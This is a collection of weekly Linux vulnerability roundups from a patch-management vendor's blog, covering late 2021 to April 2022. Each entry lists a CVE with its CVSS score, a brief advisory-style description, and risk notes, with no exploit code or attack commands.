Skip to main content
Tag

Linux

||

Top Linux Vulnerabilities for April 2022

By News

Top Linux Vulnerabilities for April 2022

Explore the top Linux vulnerabilities for April 2022 and find out the best solution for managing these threats.

1. CVE-2022-0435

Severity: Critical | CVSS Score: 9.0

A stack overflow flaw was found in the Linux kernel’s TIPC protocol functionality in the way a user sends a packet with malicious content where the number of domain member nodes is higher than the 64 allowed. This flaw allows a remote user to crash the system or possibly escalate their privileges if they have access to the TIPC network.

The highest threat from this vulnerability is to confidentiality, integrity, and to system availability.

 

Syxscore Risk Alert

This vulnerability has a critical risk as this flaw can be exposed over any network, with low attack complexity, and with low privilege requirements.

2. CVE-2022-0492

Severity: Important | CVSS Score: 7.8

A vulnerability was found in the Linux kernel’s cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function. This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges and bypass the namespace isolation unexpectedly.

The highest threat from this vulnerability is to confidentiality, integrity, and to system availability.

 Syxscore Risk Alert

This vulnerability has a high risk risk as this flaw can be exposed with low attack complexity and low privileges. It does require local network access to exploit, which lowers the overall associated risk.

3. CVE-2022-28893

Severity: Important | VSS Score: 7.2

The SUNRPC subsystem in the Linux kernel through 5.17.2 can call xs_xprt_free before ensuring that sockets are in the intended state.

The highest threat from this vulnerability is to confidentiality, Integrity, and to system availability.

Syxscore Risk Alert

This vulnerability has a high risk as this flaw can be exploited with low attack complexity, with low privileges, no user interaction, but does require local network access.

4. CVE-2022-0998

Severity: Important | CVSS Score: 7.2

An integer overflow flaw was found in the Linux kernel’s virtio device driver code in the way a user triggers the vhost_vdpa_config_validate function. This flaw allows a local user to crash or potentially escalate their privileges on the system.

The highest threat from this vulnerability is to confidentiality, Integrity, and to system availability.

Syxscore Risk Alert

This vulnerability has a high risk as this flaw can be exploited with low attack complexity, low privileges, no user interaction, but does require local network access.

5. CVE-2022-0995

Severity: Important | CVSS Score: 6.6

An out-of-bounds (OOB) memory write flaw was found in the Linux kernel’s watch_queue event notification subsystem. This flaw can overwrite parts of the kernel state, potentially allowing a local user to gain privileged access or cause a denial of service on the system.

The highest threat from this vulnerability is to confidentiality and to system availability.

Syxscore Risk Alert

This vulnerability has a high risk as this flaw can be exploited with low attack complexity, low privileges, no user interaction, but does require local network access.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
||

Linux Vulnerabilities of the Week: March 7, 2022

By News

Linux Vulnerabilities of the Week: March 7, 2022

See this week's top Linux issues and keep your IT environment protected from the latest March 2022 Linux vulnerabilities.

1. Failure to properly escape SQL input in Cyrus SASL affecting Red Hat Enterprise Linux 6

Severity: Critical         CVSS Score: 9.1

This is a flaw in the SQL plugin shipped with Cyrus SASL 2.1.17 through 2.1.27 before 2.1.28. A remote attacker can execute arbitrary SQL commands due to the failure to properly escape the SQL input. This issue can lead to the escalation of privileges.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a critical risk although it requires high privileges to be exploited, this can be exposed over any network, with low complexity, and without user interaction. Besides, this flaw allows a lateral attack to be carried out.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: High
  • User Interaction: None
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2022-24407

2. Out-of-bounds heap read/write vulnerability in Samba

Severity: Important    CVSS Score: 8.8

Samba versions before 4.13.17, 4.14.12, and 4.15.5 with vfs_fruit configured allow out-of-bounds heap read and write via specially crafted extended file attributes. Due to a boundary error when processing EA metadata while opening files in smbd within the VFS Samba module, a remote attacker with write access to extended file attributes can execute arbitrary code with the privileges of smbd, typically root.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as this can be exposed over any network, with low complexity, low privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-44142

3. Double-free of the virtual attribute context in persistent search in ds-base affecting Red Hat Enterprise Linux 8

Severity: Important    CVSS Score: 7.5

This is double-free in the way 389-ds-base handles virtual attributes context in persistent searches, which an attacker could use to send a series of search requests, forcing the server to behave unexpectedly, and crash.

The highest threat from this vulnerability is to system availability.

Syxscore Risk Alert

This vulnerability has a major risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-4091

4. Special character breaks path in XML parsing in PHP

Severity: Medium       CVSS Score: 5.3

This is a flaw in PHP. The main cause of this vulnerability is improper input validation while parsing an Extensible Markup Language(XML) entity. A special character could allow an attacker to traverse directories.

The highest threat from this vulnerability is to confidentiality and integrity.

Syxscore Risk Alert

This vulnerability has a moderate risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-21707

5. RPM’s signature vulnerability

Severity: Low  CVSS Score: 4.4

There is a flaw in RPM’s signature functionality. OpenPGP subkeys are associated with a primary key via a “binding signature. RPM does not check the binding signature of subkeys before importing them. If an attacker can add or socially engineer another party to add a malicious subkey to a legitimate public key, RPM could wrongly trust a malicious signature.

The highest threat from this vulnerability is to data integrity.

Syxscore Risk Alert

This vulnerability has a low risk as although this requires access to the same network as the device, complex attack and user interaction to be exploited, it can be exposed with low privileges.

  • Attack Vector: Local
  • Attack Complexity: High
  • Privileges Required: Low
  • User Interaction: Required
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-3521

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
||

Linux Vulnerabilities of the Week: February 14, 2022

By News

Linux Vulnerabilities of the Week: February 14, 2022

See this week's top Linux issues and keep your IT environment protected from the latest February 2022 Linux vulnerabilities.

1. Integer overflow in function XML_GetBuffer in Expat (<2.4.4) affecting Red Hat Enterprise Linux 7 and 8

Severity: Critical         CVSS Score: 9.8

Expat (libexpat) is susceptible to a software flaw that causes process interruption. When processing many prefixed XML attributes on a single tag libexpat can terminate unexpectedly due to integer overflow.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a critical risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2022-23852

2. JMSAppender in Log4j 1.2 flaw

Severity: Important    CVSS Score: 7.5

JMSAppender in Log4j 1.x is vulnerable to deserialization of untrusted data. This allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender, which is not the default, and to the attacker’s JNDI LDAP endpoint.

Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as although this requires a complex attack to be exploited, this can be exposed over any network, with low privileges and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: High
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-4104

3. ASP.NET Core Krestel HTTP headers flaw

Severity: Important    CVSS Score: 7.5

This is a flaw in dotnet’s ASP.NET Core Krestel when pooling HTTP/2 and HTTP/3 headers. This vulnerability allows a remote, unauthenticated attacker to cause a denial of service.

The highest threat from this vulnerability is to system availability.

Syxscore Risk Alert

This vulnerability has a major risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2022-21986

4. Refcount leak in pep_sock_accept() in net/phonet/pep.c in the Linux kernel through 5.15.8

Severity: Medium       CVSS Score: 5.5

This is a memory leak flaw in the Linux kernel’s PhoNet (Phone Network protocol) functionality. A local user could use this flaw to starve the resources causing a denial of service.

The highest threat from this vulnerability is to confidentiality.

Syxscore Risk Alert

This vulnerability has a moderate risk as although this requires access to the same network as the device to be exploited, this can be exposed with a low complexity attack, low privileges, and without user interaction.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-45095

5. A null pointer dereference in bond_ipsec_add_sa() in the Linux Kernel affecting Red Hat Enterprise Linux 8

Severity: Medium       CVSS Score: 5.5

This is a null pointer dereference in the Linux kernel’s bonding driver in the way a user bonds a non-existing or fake device. This vulnerability allows a local user to crash the system, causing a denial of service.

The highest threat from this vulnerability is to system availability.

Syxscore Risk Alert

This vulnerability has a moderate risk as although this requires access to the same network as the device to be exploited, this can be exposed with a low complexity attack, low privileges, and without user interaction.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2022-0286

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
||

Linux Vulnerabilities of the Week: February 08, 2022

By News

Linux Vulnerabilities of the Week: February 8, 2022

See this week's top Linux issues and keep your IT environment protected from the latest February 2022 Linux vulnerabilities.

1. SQL injection in Log4j 1.x when the application is configured to use JDBCAppender

Severity: Critical         CVSS Score: 9.8

This is a flaw in the Java logging library Apache Log4j in version 1.x, which makes JDBCAppender in Log4j 1.x vulnerable to SQL injection in untrusted data. A remote attacker can use this vulnerability to run SQL statements in the database if the deployed application is configured to use JDBCAppender with certain interpolation tokens.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a critical risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2022-23305

2. A heap-based buffer overflow vulnerability in AIDE (<0.17.4) affecting Red Hat Enterprise Linux 6, 7 and 8

Severity: Important    CVSS Score: 7.8

AIDE allows local users to obtain root privileges via crafted file metadata (such as XFS extended attributes or tmpfs ACLs), crash the program, and possibly execute arbitrary code, because of a heap-based buffer overflow.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as although this requires access to the same network as the device to be exploited, this can be exposed with a low complexity attack, low privileges and without user interaction.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-45417

CVE Reference(s): CVE-2021-44790

3. An uncontrolled resource consumption flaw in Go (< 1.16.12)

Severity: Important    CVSS Score: 7.5

This is a flaw in Golang’s net/http library in the canonicalHeader() function. It allows an attacker who submits specially crafted requests to applications linked with net/http’s http2 functionality to cause excessive resource consumption that could lead to a denial of service or otherwise impact system performance and resources.

The highest threat from this vulnerability is to system availability.

Syxscore Risk Alert

This vulnerability has a major risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-44716

4. Libreswan (4.2 through 4.5) flaw

Severity: Important    CVSS Score: 7.5

This is a flaw in Libreswan that remote attackers could exploit to cause a denial of service (NULL pointer dereference and daemon crash) via a crafted IKEv1 packet because pluto/ikev1.c wrongly expects that a state object exists. This is fixed in 4.6.

The highest threat from this vulnerability is to system availability.

Syxscore Risk Alert

This vulnerability has a major risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2022-23094

5. Incorrect IdentityHashMap size checks during deserialization in Open JDK

Severity: Medium       CVSS Score: 5.3

This is an easily exploitable flaw in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries) that allows an unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DoS) of Oracle Java SE, Oracle GraalVM Enterprise Edition.

The highest threat from this vulnerability is to system availability.

Syxscore Risk Alert

This vulnerability has a moderate risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2022-21294

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
||

Linux Vulnerabilities of the Week: January 10, 2022

By News

Linux Vulnerabilities of the Week: January 10, 2022

See this week's top Linux issues and keep your IT environment protected from the latest January 2022 Linux vulnerabilities.

1. Mozilla iframe sandbox rules vulnerability

Severity: Critical         CVSS Score: 10.0

Due to incorrect application of iframe sandbox rules to XSLT stylesheets, an iframe can bypass restrictions such as executing scripts or navigating the top-level frame. This vulnerability affects Firefox < 94, Thunderbird < 91.3, and Firefox ESR < 91.3.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a critical risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction. Besides, this vulnerability allows a lateral attack to be made, due to the changed jump point.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-38503

2. Possible buffer overflow in the mod_lua multipart parser affecting Red Hat Enterprise Linux 7 and 8

Severity: Important    CVSS Score: 9.8

A buffer overflow flaw in httpd’s Lua module could allow an out-of-bounds write. The Apache httpd team is not aware of an exploit for the vulnerability though it might be possible to craft one. This issue affects Apache HTTP Server 2.4.51 and earlier.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a critical risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-44790

3. Remote code execution in Log4j 1.x affecting Red Hat Enterprise Linux 8

Severity: Important    CVSS Score: 7.5

JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. This allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender and to the attacker’s JNDI LDAP endpoint.

This issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached the end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as although this requires a complex attack to be exploited, it can be exposed over any network, with low privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: High
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-4104

4. Read buffer overruns processing ASN.1 strings in OpenSSL

Severity: Important    CVSS Score: 7.4

It was found that OpenSSL assumed ASN.1 strings to be NUL terminated. An attacker may be able to force an application into calling OpenSSL function with a specially crafted, non-NUL terminated string to deliberately hit this bug, which may result in a crash of the application, causing a Denial-of-Service attack, or possibly, memory disclosure.

The highest threat from this vulnerability is to data confidentiality and system availability.

Syxscore Risk Alert

This vulnerability has a major risk as although this requires a complex attack to be exploited, it can be exposed over any network, with no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: High
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-3712

5. Python-lxml’s HTML flaw affecting Red Hat Enterprise Linux 8

Severity: Important    CVSS Score: 7.1

There’s a flaw in python-lxml’s HTML Cleaner component, which is responsible for sanitizing HTML and JavaScript.

An attacker who can submit a crafted payload to a web service using python-lxml’s HTML Cleaner may be able to trigger script execution in clients such as web browsers.

The highest threat from this vulnerability is to integrity.

Syxscore Risk Alert

This vulnerability has a major risk as although this requires user interaction to be exploited, it can be exposed over any network, with a low complexity attack, and without privileges. Besides, this vulnerability allows a lateral attack to be made, due to the changed jump point.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-43818

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
||

Linux Vulnerabilities of the Week: December 20, 2021

By News

Linux Vulnerabilities of the Week: December 20, 2021

See this week's top Linux issues and keep your IT environment protected from the latest December Linux vulnerabilities.

1. Apache Log4j logging library vulnerability

Severity: Critical         CVSS Score: 10.0

This is a flaw in Apache that allows an attacker who can control log messages or log message parameters to execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as this can be exposed over any network, with low complexity, low privileges, and without user interaction. Besides, this vulnerability allows a lateral attack to be made, due to the changed jump point.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-44228

2. Java logging library Apache Log4j (version 1.x) flaw affecting Red Hat Enterprise Linux 8

Severity: Important    CVSS Score: 8.1

MSAppender in Log4j 1.x is vulnerable to deserialization of untrusted data. This allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender and to the attacker’s JMS Broker.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as although this requires a complex attack to be exploited, it can be exposed over any network, without privileges and user interaction.

  • Attack Vector: Network
  • Attack Complexity: High
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-4104

3. STARTTLS session encryption bypassing in Fetchmail (< 6.4.22) affecting Red Hat Enterprise Linux 8

Severity: Medium       CVSS Score: 5.9

Fetchmail before 6.4.22 fails to enforce STARTTLS session encryption in some circumstances, such as a certain situation with IMAP and PREAUTH.

The highest threat from this vulnerability is to data confidentiality.

Syxscore Risk Alert

This vulnerability has a major risk as although this requires a complex attack to be exploited, it can be exposed over any network, without privileges and user interaction.

  • Attack Vector: Network
  • Attack Complexity: High
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-39272

4. RESTEasy (<4.6.0.Final) vulnerability

Severity: Medium       CVSS Score: 5.3

This is a flaw in all versions of RESTEasy up to 4.6.0.Final. The endpoint class and method names are returned as part of the exception response when RESTEasy cannot convert one of the request URI path or query values to the matching JAX-RS resource method’s parameter value. The highest threat from this vulnerability is to data confidentiality.

Syxscore Risk Alert

This vulnerability has a moderate risk as this can be exposed over any network, with low complexity, low privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-20289

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
||

Linux Vulnerabilities of the Week: December 6, 2021

By News

Linux Vulnerabilities of the Week: December 6, 2021

See this week's top Linux issues and keep your IT environment protected from the latest December Linux vulnerabilities.

1. CSRF token bypass in Mailman (<2.1.38)

Severity: Important    CVSS Score: 8.8

A Cross-Site Request Forgery (CSRF) attack can be performed in GNU Mailman due to a CSRF token bypass.

CSRF tokens are not checked against the right type of user when performing admin operations and a token created by a regular user can be used by an admin to perform an admin-level request to set a new admin password or make other changes.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as though it requires user interaction, this can be exposed over any network, with low complexity, and without privileges.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-44227

2. Xen PoD Operation denial of service

Severity: Important    CVSS Score: 8.8

PoD operations on misaligned GFNs T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] x86 HVM and PVH guests may be started in populate-on-demand (PoD) mode, to provide a way for them to later easily have more memory assigned. Guests are permitted to control certain P2M aspects of individual pages via hypercalls. These hypercalls may act on ranges of pages specified via page orders (resulting in a power-of-2 number of pages).

The implementation of some of these hypercalls for PoD does not enforce the base page frame number to be suitably aligned for the specified order, yet some code involved in PoD handling actually makes such an assumption. These operations are XENMEM_decrease_reservation (CVE-2021-28704) and XENMEM_populate_physmap (CVE-2021-28707), the latter usable only by domains controlling the guest, i.e. a de-privileged qemu or a stub domain. (Patch 1, combining the fix to both these two issues.) In addition handling of XENMEM_decrease_reservation can also trigger a host crash when the specified page order is neither 4k nor 2M nor 1G (CVE-2021-28708, patch 2).

Syxscore Risk Alert

This vulnerability has a major risk as although this needs access to the same network as the device, it can be exposed with a low-complexity attack, low privileges, and without user interaction. Besides, this vulnerability allows a lateral attack to be made, due to the changed jump point.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-28708

3. Insufficient symlink protection in Node.js ‘tar file’

Severity: Important    CVSS Score: 8.6

This is a flaw in the npm package “tar” (aka node-tar). Extracting tar files that contain both a directory and a symlink with the same name, where the symlink and directory names in the archive entry used backslashes as a path separator, made it possible to bypass node-tar symlink checks on directories.

This flaw allows an untrusted ‘tar file’ to extract and overwrite files into an arbitrary location. A similar confusion can arise on case-insensitive filesystems.

The highest threat from this vulnerability is to integrity and system availability.

Syxscore Risk Alert

This vulnerability has a major risk as although this requires access to the same network as the device and user interaction to be exploited, it can be exposed with a low-complexity attack, and without privileges. Besides, this vulnerability allows a lateral attack to be made, due to the changed jump point.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-37701

4. Node.js ‘npmcli/arborist’ library vulnerability

Severity: Important    CVSS Score: 7.8

`@npmcli/arborist`, the library that calculates dependency trees and manages the node_modules folder hierarchy for the npm command-line interface, aims to guarantee that package dependency contracts will be met, and the extraction of package contents will always be performed into the expected folder. This is accomplished by extracting package contents into a project’s `node_modules` folder. If the `node_modules` folder of the root project or any of its dependencies is somehow replaced with a symbolic link, it could allow Arborist to write package dependencies to any arbitrary location on the file system.

Syxscore Risk Alert

This vulnerability has a major risk as although this needs access to the same network as the device and requires user interaction, it can be exposed with a low-complexity attack and without privileges.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-39135

5. Incorrect parsing of HTTP transfer-encoding request header in Apache Tomcat

Severity: Medium       CVSS Score: 5.3

This is a flaw in Apache Tomcat. Tomcat incorrectly ignored the transfer encoding header if the client declared it would only accept an HTTP/1.0 response.

The highest threat from this vulnerability is to integrity.

Syxscore Risk Alert

This vulnerability has a moderate risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-33037

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
||

Linux Vulnerabilities of the Week: November 30, 2021

By News

Linux Vulnerabilities of the Week: November 30, 2021

See this week's top Linux issues and keep your IT environment protected from the latest November Linux vulnerabilities.

1. A heap buffer overflow in Redis (>2.6)

Severity: Important    CVSS Score: 8.8

Redis is an open-source, in-memory database that persists on disk. In affected versions Specially crafted Lua scripts executing in Redis cause the heap-based Lua stack to overflow due to incomplete checks for this condition. This flaw allows a remote attacker to corrupt the heap and potentially trigger remote code execution.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as this can be exposed over any network, with low complexity, low privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-32626

2. Memory corruption in WebKitGTK affecting Red Hat Enterprise Linux 8

Severity: Important    CVSS Score: 7.8

This is a flaw in WebKitGTK. Processing maliciously crafted web content may lead to arbitrary code execution.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as although this needs access to the same network as the device and requires user interaction, it can be exposed by an unprivileged user with a low complexity attack.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-30846

3. Incorrect principal selection in OpenJDK

Severity: Medium       CVSS Score: 6.8

This is a vulnerability in the Java SE (8u301, 11.0.12, 17), Oracle GraalVM Enterprise Edition (20.3.3 and 21.2.0) product of Oracle Java SE (component: Libraries).

Exploiting this flaw, a low privileged attacker with network access via Kerberos can compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can lead to unauthorized access to critical data or complete access to all Java SE, Oracle GraalVM Enterprise Edition accessible data.

The highest threat from this vulnerability is to data confidentiality.

Syxscore Risk Alert

This vulnerability has a moderate risk as although requires user interaction to be exploited, it can be exposed over any network, with a low complexity attack, and low privileges. Besides, this vulnerability allows a lateral attack to be made, due to the changed jump point.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: Required
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-35567

4. Limited sandbox escape via VFS syscalls in WebKitGTK

Severity: Medium       CVSS Score: 5.3

BubblewrapLauncher.cpp in WebKitGTK and WPE WebKit before 2.34.1 allows a limited sandbox bypass that allows a sandboxed process to trick host processes into thinking the sandboxed process is not confined by the sandbox, by abusing VFS syscalls that manipulate its filesystem namespace.

The impact is limited to host services that create UNIX sockets that WebKit mounts inside its sandbox, and the sandboxed process remains otherwise confined.

Syxscore Risk Alert

This vulnerability has a moderate risk as although this needs access to the same network as the device, it can be exposed with a low complexity attack, low privileges, and without user interaction.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-42762

5. Server response processing flaw in Bind affecting Red Hat Enterprise Linux 8

Severity: Medium       CVSS Score: 5.3

This is a flaw in BIND 9.3.0 -> 9.11.35, 9.12.0 -> 9.16.21, and versions 9.9.3-S1 -> 9.11.35-S1 and 9.16.8-S1 -> 9.16.21-S1 of BIND Supported Preview Edition, as well as release versions 9.17.0 -> 9.17.18 of the BIND 9.17 development branch.

The way the lame cache is currently designed makes it possible for its internal data structures to grow almost infinitely. This caching mechanism could be abused by an attacker to significantly degrade resolver performance.

The highest threat from this vulnerability is to system availability.

Syxscore Risk Alert

This vulnerability has a moderate risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-25219

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
||

Linux Vulnerabilities of the Week: November 22, 2021

By News

Linux Vulnerabilities of the Week: November 22, 2021

See this week's top Linux issues and keep your IT environment protected from the latest November Linux vulnerabilities.

1. Out-of-bounds write to memory in FreeRDP

 Severity: Important   CVSS Score: 8.8

This is a flaw in the FreeRDP, a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license.

In affected versions, a malicious server can send graphics updates to a client to cause an out-of-bounds write in client memory using a specially crafted input. Finally, this vulnerability could allow arbitrary code to be executed on the target system.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as though it requires user interaction, this can be exposed over any network, with low complexity and without privileges.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-41160

2. SVM-nested virtualization issue in KVM

Severity: Important    CVSS Score: 8.8

This is a flaw in the KVM’s AMD code for supporting SVM-nested virtualization. The flaw occurs when processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested guest (L2). Due to improper validation of the “int_ctl” field, this issue could allow a malicious L1 to enable AVIC support (Advanced Virtual Interrupt Controller) for the L2 guest. As a result, the L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak of sensitive data, or potential guest-to-host escape.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as although this needs access to the same network as the device, it can be exposed with a low complexity attack, low privileges, and without user interaction. Besides, this vulnerability allows a lateral attack to be made, due to the changed jump point.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-3653

